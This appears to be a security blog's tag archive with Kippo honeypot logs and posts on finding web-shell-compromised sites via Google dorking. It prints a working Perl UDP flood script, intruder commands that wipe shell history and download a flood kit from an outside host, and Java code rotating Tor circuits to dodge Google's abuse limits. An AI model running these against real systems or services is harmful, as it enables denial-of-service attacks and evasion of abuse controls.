
Tag Archives: web security

Short but sweet.

dev:~# w
 09:27:26 up 29 days, 19:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
dev:~# export HISTFILE=/dev/null
dev:~# export HISTSIZE=0
dev:~# w
 09:27:58 up 29 days, 19:49,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
dev:~# wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN
-US/W2Ksp3.exe
--2012-10-25 09:30:05--  http://download.microsoft.com/download/win2000platform/
SP/SP3/NT5/EN-US/W2Ksp3.exe
Connecting to download.microsoft.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exe

 0% [>                                      ] 1,098        0K/s  eta 1d 21h 7m 1
 0% [>                                      ] 22,818       11K/s  eta 3h 11m 15s
 0% [>                                      ] 182,850      69K/s  eta 31m 27s
 2% [>                                      ] 3,149,716    363K/s  eta 5m 52s^C
200 OK
dev:~# rm -rf .bash_history
dev:~# touch .bash_history
dev:~#

Seems a little odd that our friend 79.147.238.131 (which appears to be a residential, though dynamically assigned, IP) would go to so much effort only to disconnect the session, but oh well.


I set up a Kippo honeypot a few weeks ago on a micro Amazon instance and left it running, eventually letting it slip my mind. Today, I remembered to check it out, and what do you know, I got some results.

Unfortunately for our intruder, Kippo wasn’t particularly cooperative. Here’s the log:

dev:~# w
 15:34:22 up 13 days,  1:55,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    5.13.84.3         15:34    0.00s  0.00s  0.00s w
dev:~# cat /proc/cpuinfo
[--- snip ---]
dev:~# wget http://cachefly.cachefly.net/100mb.test
--2012-10-08 15:35:37-- http://cachefly.cachefly.net/100mb.test
Connecting to cachefly.cachefly.net:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100mb.test

100%[======================================>] 104,857,600 10113K/s

2012-10-08 15:35:48 (10113 KB/s) - `100mb.test' saved [104857600/104857600]
dev:~# wget http://root-arhive.clan.su/flood/global/udp.tgz
--2012-10-08 15:36:00-- http://root-arhive.clan.su/flood/global/udp.tgz
Connecting to root-arhive.clan.su:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 529 (529bytes) [application/octet-stream]
Saving to: `udp.tgz

100%[======================================>] 529 0K/s

2012-10-08 15:36:01 (0 KB/s) - `udp.tgz' saved [529/529]
dev:~# tar xzvf udp.tgx
tar: udp.tgx: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
dev:~# tar xzvf udp.tgz
udp.pl
dev:~# chmod +x *
dev:~# perl udp.pl 12
bash: perl: command not found
dev:~# apt-get install perl
Reading package lists... Done
[--- snip ---]
Setting up perl (1.31-2) ...
dev:~# perl udp.pl 12
perl: Segmentation fault
dev:~# apt-get install kernel*
Reading package lists... Done
[--- snip ---]
Setting up kernel (1.4-6) ...
dev:~# apt-get install linux*
Reading package lists... Done
[--- snip ---]
Setting up linux (1.12-8) ...
dev:~# perl udp.pl 12
perl: Segmentation fault
dev:~#

This looks like a fairly typical attack. In short:

  • The hacker has connected from 5.13.84.3. The hacker runs w to see who else is around.
  • The hacker dumps the contents of /proc/cpuinfo to see what kind of machine they’re working with.
  • The hacker downloads http://cachefly.cachefly.net/100mb.test, presumably to check the speed of the connection.
  • The hacker downloads hxxp://root-arhive.clan.su/flood/global/udp.tgz. Looks like they want to use this machine to DoS, but I’ll take a closer look at that file in good time.
  • After this, we can see the hacker’s frustrated attempts to actually RUN their file. Naturally, Kippo is pretty uncooperative, so they soon get fed up and leave.

Now we can take a look at udp.pl. How exciting. The script itself is pretty obvious stuff, so I’ll go ahead and post it. Comments are mine:

#!/usr/bin/perl

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "for any info vizit #GlobaL \n";
 exit(1);
}

# Takes three arguments: Target, port, and how long to flood for.
my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];

# Prepares a socket connection. The last parameter is for the protocol, so I'm assuming 17 corresponds to UDP.
socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Flooding.. $ip port.. $port \n";

# If you haven't declared the port or duration...
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
# If you HAVE declared the port and duration
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
# If you have declared the port, but not the duration
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
# If you've declared the duration, but not the port
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

# Flood the given port
packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

# Flood a random port
randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

If you’re going to allow ssh access to your server, remember to secure it. Even if you don’t have any data worth stealing, it’s easy for people to turn your machine against others.

Original Post: https://bitsmash.wordpress.com/2012/07/29/finding-compromised-hosts-with-the-google-search-api/

As mentioned before, there were some problems with the simple Google dorking approach:

  • Google don’t like automated scraping. Though I doubt this qualifies as automated scraping, I do store the results, which may breach the API’s terms of service. Furthermore, after a few searches, the Python script set off suspected abuse triggers and was temporarily blocked from accessing the API.
  • Without automation, doubling the searches doubles the effort. The script definitely needs expanding to find more types of shell.
  • Subsequent similar google searches are likely to return a lot of results that you’ve already seen.
  • There are a lot of false positives. I mentioned before that a number of results are people asking for help with compromised machines. Similarly, there are unwanted results like pastebinned copies of the shell source, etc.

Fortunately, all of these problems have solutions. Some even have a couple, depending on how you feel about sticking to TOS agreements.

Keeping Google Happy: The Good Way

Google provide several hints for distinguishing your traffic from automated scraping traffic. For applications written in Python, Java, etc., they recommend adding the “userip” parameter to HTTP requests, carrying the IP address of the end user making the request.
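For instance, the same request the original Python script makes could carry that parameter along with it. A rough Java sketch (the endpoint and query are the ones used there; the class name and IP address are just placeholders for whichever end user triggered the request):

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;

public class UserIpSearch {
    public static void main(String[] args) throws Exception {
        // Same deprecated AJAX endpoint the Python script uses, plus "userip"
        String query = "uname%20user%20php%20hdd%20cwd%20WSO";
        String userIp = "203.0.113.7"; // placeholder: the end user's IP address
        URL url = new URL("http://ajax.googleapis.com/ajax/services/search/web"
                + "?v=1.0&q=" + query + "&userip=" + userIp);
        try (BufferedReader in = new BufferedReader(
                new InputStreamReader(url.openStream()))) {
            String line;
            while ((line = in.readLine()) != null) {
                System.out.println(line); // raw JSON result page
            }
        }
    }
}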

Keeping Google Happy: The Bad Way

The problem is, when making large volumes of requests, especially for a fixed set of search terms, it’s still possible to set off abuse triggers, despite making these efforts to follow their TOS. The solution, if honest attempts to distinguish your traffic from fraudulent traffic fail, is to tunnel your requests through enough different proxies that not too many of these requests come from one location.

With Tor and Java, this is easy. When you start Tor through the Tor Browser Bundle, a SOCKS proxy opens on port 9050 by default, and the Tor control port listens for commands on port 9051. You can tunnel traffic from a Java program through the SOCKS proxy by setting the following system properties at the beginning of your code:

System.getProperties().put("proxySet", "true");
System.getProperties().put("socksProxyHost", "localhost");
System.getProperties().put("socksProxyPort", "9050");

You can talk to the control port on 9051 by opening a socket connection and writing commands to it. To tell Tor to use a new route:

// Ask Tor's control port for a new circuit
try (Socket socket = new Socket("localhost", 9051);
     PrintWriter out = new PrintWriter(socket.getOutputStream(), true)) {
    out.println("AUTHENTICATE \"password\"");
    out.println("SIGNAL NEWNYM");
}

After a few seconds, Tor will begin routing traffic through a different path, and you can continue scraping with wild abandon.
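Putting the pieces together, the scraper can request a new identity after each batch of searches and pause briefly so the new circuit actually takes effect. A minimal sketch of that pattern (the batch size and delay are arbitrary, and doSearch() is a stand-in for whatever request you’re really making):

import java.io.PrintWriter;
import java.net.Socket;

public class RotatingScraper {
    static final int BATCH_SIZE = 20; // arbitrary: requests per Tor circuit

    // The control-port snippet from above, wrapped in a method
    static void requestNewIdentity() throws Exception {
        try (Socket control = new Socket("localhost", 9051);
             PrintWriter out = new PrintWriter(control.getOutputStream(), true)) {
            out.println("AUTHENTICATE \"password\"");
            out.println("SIGNAL NEWNYM");
        }
    }

    static void doSearch(int page) {
        // placeholder for the real search request (e.g. the userip example above)
        System.out.println("fetching result page " + page);
    }

    public static void main(String[] args) throws Exception {
        for (int page = 1; page <= 100; page++) {
            if (page % BATCH_SIZE == 0) {
                requestNewIdentity();
                Thread.sleep(10_000); // give Tor a few seconds to switch circuits
            }
            doSearch(page);
        }
    }
}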

Scaling Searches

Pretty self-explanatory:

// resultCount variable is used in shell search to control result page offset
for (int i = 1; i <= resultCount; i++) {
    getWSOShells(i);
    getR57Shells(i);
    // ... more shell types
}

Trimming The Fat

To ensure that I don’t have to spend any time wading through duplicated results, I had the scraper pile the information into a database. The table has only four columns: Page Title, URL, Shell Type, and Date Found, with a unique index on (PageTitle, URL), so any attempt to insert a shell that has already been discovered is rejected by the database.
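In code, that just means letting the unique index do the work: insert every result and treat a constraint violation as “seen it already”. A JDBC sketch of the idea (the connection string, credentials, and exact table and column names are assumptions; only the four columns and the unique index on page title and URL reflect the real table):

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLIntegrityConstraintViolationException;

public class ShellStore {
    /*
     * Assumed schema, mirroring the columns described above:
     *   CREATE TABLE shells (
     *     page_title VARCHAR(255),
     *     url        VARCHAR(255),
     *     shell_type VARCHAR(32),
     *     date_found DATE,
     *     UNIQUE KEY already_seen (page_title, url)
     *   );
     */
    public static void main(String[] args) throws Exception {
        try (Connection db = DriverManager.getConnection(
                 "jdbc:mysql://localhost/shelltale", "user", "password");
             PreparedStatement insert = db.prepareStatement(
                 "INSERT INTO shells (page_title, url, shell_type, date_found) "
                 + "VALUES (?, ?, ?, CURDATE())")) {
            insert.setString(1, "Example page title");
            insert.setString(2, "http://example.com/wso.php");
            insert.setString(3, "WSO");
            insert.executeUpdate();
        } catch (SQLIntegrityConstraintViolationException alreadySeen) {
            // The unique index rejected the row: this shell is already recorded.
        }
    }
}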

The only thing left to do is throw together a pretty stats page for the discovered shells.

Reducing False Positives

This is the only task I have yet to complete. More in-depth inspection of the compromised sites (automated or otherwise) isn’t something I’m interested in; that’s one step too far into the ethical grey area.

The moral of the story is that it’s very easy to make a site with an old, out-of-date CMS, forget about it, and have it compromised without ever knowing. And it’s even easier for people with worse intentions than mine to find your compromised site with zero effort or technical ability and use it for something bad. Be careful what you leave lying around.

The JSP backdoor I mentioned in the last post inspired me to do a little playing around with PHP backdoors. PHP backdoors range from incredibly simple to extremely elaborate, and can either be standalone .php scripts uploaded to a vulnerable server or code inserted directly into an existing page. The interfaces for some of these shells are quite distinctive, and I thought: surely some of them have to have been indexed by search spiders?

Google provides a search API, but it is fairly limited in the number of searches you can perform per day. It only returns a couple of results at a time, so you have to make several requests to get a decent number of results per search. The API is also deprecated, so they reserve the right to turn it off at any time.

The shell I’m focusing on for now is the WSO Shell (Web Shell by Orb). Like many shells, it includes a set of server stats along with the command line. A Google search for the terms “uname user php hdd cwd WSO” currently returns about 12,700 results. The results from the first page are divided into two groups:

  • People asking for help with their compromised servers
  • Websites with the shell interface bang in the middle (bingo!)

I whipped up a pretty shaky Python script to do the heavy lifting:

#!/usr/bin/env python

import sys
import httplib
import json

#########
# STRINGS

WSOShell = '/search?btnG=1&pws=0&q=uname%20user%20php%20hdd%20cwd%20WSO'

def usage():
	print "Usage:"
	print "./shelltale.py [mode]"
	print "Modes: --easy, --hard"
	return

def get_json_results(start):
	conn = httplib.HTTPConnection('ajax.googleapis.com')
	conn.putrequest('GET','/ajax/services/search/web?v=1.0&start='+str(start)+'&q=uname%20user%20php%20hdd%20cwd%20WSO')
	conn.endheaders();
	response = conn.getresponse()
	json_data = json.load(response)
				
	results = json_data['responseData']['results']
	
	for i in range(len(results)):
		print "| " + results[i]['titleNoFormatting']
		print "| - " + results[i]['unescapedUrl']

try:
	if(len(sys.argv) > 1):
		if sys.argv[1] == '--easy':
			print "Scraping small result set from json api."
			print "| Results --------------------------------------"
			for i in range(10):
				get_json_results(i*4)
			print "|-----------------------------------------------"
		elif sys.argv[1] == '--hard':
			print "Scraping bigger result set from search."
			# Room for expansion here
		else:
			usage()
			exit()
	else:
		usage()
		exit()
except IOError, e: 
	if hasattr(e, 'code'): # HTTPError 
		print 'http error code: ', e.code 
	elif hasattr(e, 'reason'): # URLError 
		print "can't connect, reason: ", e.reason 
	else: 
		raise

… and along comes the stream of nicely formatted results.

Extensions to make:

  • Bypass limits/risks of API by making a scraper for regular google search results
  • Add more search strings for other types of shell
  • Tunnel requests through assorted proxies to avoid IPs getting blocked for too many searches
  • Store results in a database so duplicates are easy to weed out

Disclaimer: I didn’t go on any of these sites. Verification of the shell’s presence was performed by checking the preview screenshot Google supplies with the search results. The most responsible use of the information presented here would be to warn website owners that their machines have been compromised.